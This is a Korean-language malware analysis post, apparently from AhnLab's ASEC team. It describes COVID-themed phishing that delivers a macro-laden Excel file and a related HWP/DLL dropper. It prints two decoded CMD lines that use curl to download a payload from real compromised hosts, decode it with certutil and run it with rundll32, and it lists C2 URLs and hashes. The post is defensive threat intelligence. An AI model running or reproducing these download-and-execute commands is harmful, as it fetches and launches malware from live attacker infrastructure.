본문 바로가기
악성코드 정보

코로나 예측 결과 위장 악성 문서(xls) 유포 중

by AhnLab ASEC 분석팀 2020. 7. 15.

올해 코로나 관련된 주제의 악성코드가 끊임없이 발견되고 있는 가운데 이번에도 ASEC 분석팀에서는 '코로나 예측 결과'에 대한 내용으로 사용자를 속여 메일과 문서를 열람하도록한 공격을 확인하였다. 피싱 메일을 통해 유포되었으며 이 메일에는 악성 엑셀 문서가 첨부되어 있다. 

 

[그림1] - 유포 중인 피싱 메일

 

첨부된 악성 엑셀 파일은 국가별 코로나 확진자 사망자의 수를 확인 할 수 있는 내용이 포함되어 있으며 특히 누적 확진 사망자의 인원을 확인하길 원하는 사용자는 엑셀 내부에 있는 계산 버튼('Predict')를 선택하기 위해 매크로 활성화 버튼을 선택할 수 밖에 없다.

 

[그림2] - 매크로 허용 유도

 

하지만 해당 누적 계산을 수행하는 정상적인 매크로 코드 하위에는 악성파일을 다운로드하는 난독화 된 코드가 포함되어있다. 이 코드를 복호화 후에 CMD 명령을 확인 할 수 있다.

 

[그림3] - 난독화된 코드 복호화

 

  • 악성 엑셀 내부 CMD 명령
cmd /c curl "http://refeeldominicana.nwideas.com/wp-content/uploads/chimps/category.php" -o "%temp%\1.tmp"&certutil -decode "%temp%\1.tmp" "%temp%\lk.tmp"&cmd /c del "%temp%\1.tmp"

 

[그림4] - 자사 RAPIT 시스템에서 확인되는 프로세스 트리 구조

 

현재는 다운로드되지 않아 추가 악성코드의 기능에 대해서는 확인이 불가하지만 위 명령에서 확인 할 수 있는 것처럼 'certutil --decode'를 사용하는 것으로 보아 BASE64로 인코딩된 파일이 다운로드되어 해당 코드로 디코딩 후 동작할 것으로 보인다.

 

 

나아가 ASEC 분석팀에서는 이러한 형태의 동작 방식의 악성코드 유포가 HWP에서도 이루어지는 정황을 확인하였다. 그 내용을 아래에 추가 설명하고자 한다.

 

자사의 인프라를 통해 아래와 같이 HWP 한글 파일에서 특정 네트워크로 악성코드 다운로드 시도하는 로그를 확인 할 수 있는데 위의 엑셀 파일과 유사한 주소의 형태로 접근을 시도한다.

 

[그림5] - 로그1
[그림6] - 로그2
[그림7] - 로그3
[그림8] - 그림1에서 다운로드되는 그림파일

 

[그림1]에서 확인되는 주소에서 다운로드되는 그림파일은 위와 같이 코로나와 관련된 이미지로 이 또한 유사성을 연결할 수 있으며 이 HWP파일이 확인 된 시스템 내의 악성 DLL이 수행하는 CMD명령 또한 엑셀 파일과 유사한 것을 알 수 있다.

 

  • 악성 DLL 내부 CMD 명령
cmd.exe /c curl "https://www.cooper9.com/wp-content/uploads/js_composer/temp/category.php" -o a.b&certutil -decode a.b acview.dll&del a.b&rundll32 acview.dll,fZ2mCzDy

 

 

이렇듯 꾸준한 사회공학기법으로 악성 문서들이 메일을 포함하여 다양한 경로로 유포되고 있어 사용자들은 출처가 불분명한 문서들의 열람을 주의해야한다. 이와 같은 악성 파일들을 안랩 V3에서는 아래와 같이 진단하고 있다.

 

  • Trojan/XLS.Agent (2020.07.13.05)
  • Trojan/Win32.Hwdoor.C4160390 (2020.07.15.00)

 

[관련  IOC 정보]

 

  • C2 

    hxxp://refeeldominicana.nwideas.com/wp-content/uploads/chimps/category.php

    hxxps://www.cooper9.com/wp-content/uploads/js_composer/temp/category.php

    hxxp://peoplepowerexchange.com/wp-content/uploads/js_composer/mailchimpery/category.php?uid=0&udx=135fd4148d69841e14422c2e54023b1d

    hxxp://healthtekpak.com/wp-content/uploads/mailchimp/category.php?uid=0&udx=e24ccd3d9410592a3e86f0a90d2b9204

    hxxp://lespetitsmotsdeslibraires.fr/wp-content/plugins/wysija-newsletters/temp/category.php?uid=0&udx=c50cc95a9a02da938ccda79f28c6472b

 

  • HASH

    268efe92a6e16c89e62bf0c32113d0c9

    41143874a935fb60bcd4e73a2540f8fb

 

댓글0